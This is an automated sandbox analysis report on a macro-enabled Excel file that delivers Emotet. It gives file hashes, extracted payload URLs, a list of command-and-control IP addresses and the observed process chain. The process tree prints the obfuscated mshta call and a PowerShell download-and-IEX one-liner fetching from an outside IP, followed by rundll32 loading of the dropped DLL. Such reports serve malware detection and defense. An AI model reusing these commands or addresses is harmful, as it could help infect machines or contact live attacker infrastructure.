Analysis
-
max time kernel
144s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
18-01-2022 21:51
Behavioral task
behavioral1
Sample
QHB_677187.xlsm
Resource
win7-en-20211208
General
-
Target
QHB_677187.xlsm
-
Size
112KB
-
MD5
2f00a54638c5af4aa67c03f1d7ec12d0
-
SHA1
23994a8656707b655417077ca79294dd5a82cf36
-
SHA256
a0cc02185b718d8a8caec87fdee0f6aae676b61e1c69915cbd8d8e2600263b12
-
SHA512
c50ae050b50fb210c640cdd014a211f1eae5b35ba25d2728f9bb6e726ca81b459e0d593a75bf7e20d5717c008d3b004da83f63a59e0ce1cdad4a826c59070220
Malware Config
Extracted
http://92.255.57.195/ru/ru.html
Extracted
http://92.255.57.195/ru/ru.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3056 1416 cmd.exe 50 -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2620 created 532 2620 WerFault.exe 54 -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
flow pid Process 15 532 mshta.exe 17 2124 powershell.exe 19 2124 powershell.exe 30 3424 rundll32.exe 31 3424 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 4 IoCs
pid Process 2648 rundll32.exe 3200 rundll32.exe 3300 rundll32.exe 3424 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Qegfkxvmwblywl\wsey.odi rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3944 532 WerFault.exe 54 -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1416 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2124 powershell.exe 2124 powershell.exe 3944 WerFault.exe 3944 WerFault.exe 3424 rundll32.exe 3424 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2124 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE 1416 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1416 wrote to memory of 3056 1416 EXCEL.EXE 52 PID 1416 wrote to memory of 3056 1416 EXCEL.EXE 52 PID 3056 wrote to memory of 532 3056 cmd.exe 54 PID 3056 wrote to memory of 532 3056 cmd.exe 54 PID 532 wrote to memory of 2124 532 mshta.exe 57 PID 532 wrote to memory of 2124 532 mshta.exe 57 PID 2620 wrote to memory of 532 2620 WerFault.exe 54 PID 2620 wrote to memory of 532 2620 WerFault.exe 54 PID 2124 wrote to memory of 1832 2124 powershell.exe 60 PID 2124 wrote to memory of 1832 2124 powershell.exe 60 PID 1832 wrote to memory of 2648 1832 cmd.exe 61 PID 1832 wrote to memory of 2648 1832 cmd.exe 61 PID 1832 wrote to memory of 2648 1832 cmd.exe 61 PID 2648 wrote to memory of 3200 2648 rundll32.exe 62 PID 2648 wrote to memory of 3200 2648 rundll32.exe 62 PID 2648 wrote to memory of 3200 2648 rundll32.exe 62 PID 3200 wrote to memory of 3300 3200 rundll32.exe 66 PID 3200 wrote to memory of 3300 3200 rundll32.exe 66 PID 3200 wrote to memory of 3300 3200 rundll32.exe 66 PID 3300 wrote to memory of 3424 3300 rundll32.exe 67 PID 3300 wrote to memory of 3424 3300 rundll32.exe 67 PID 3300 wrote to memory of 3424 3300 rundll32.exe 67
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\QHB_677187.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/92.255.57.195/ru/ru.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\mshta.exemshta http://92.255.57.195/ru/ru.html3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/ru/ru.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qegfkxvmwblywl\wsey.odi",uyhWspaUCvxDAxt8⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qegfkxvmwblywl\wsey.odi",DllRegisterServer9⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3424
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 532 -s 17084⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 532 -ip 5321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2620